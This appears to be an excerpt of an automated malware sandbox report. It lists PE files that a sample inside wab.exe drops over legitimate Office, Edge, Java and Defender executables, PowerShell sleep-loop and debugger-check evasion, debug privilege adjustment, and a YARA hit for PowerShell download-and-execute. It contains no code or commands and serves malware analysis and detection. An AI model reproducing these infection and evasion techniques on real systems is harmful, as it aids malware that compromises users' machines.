Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Windows\svchost.com Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456 Thread sleep count: 5923 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968 Thread sleep count: 3920 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 748 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWTwQ
Source: powershell.exe, 00000002.00000002.2595858284.0000025070A47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
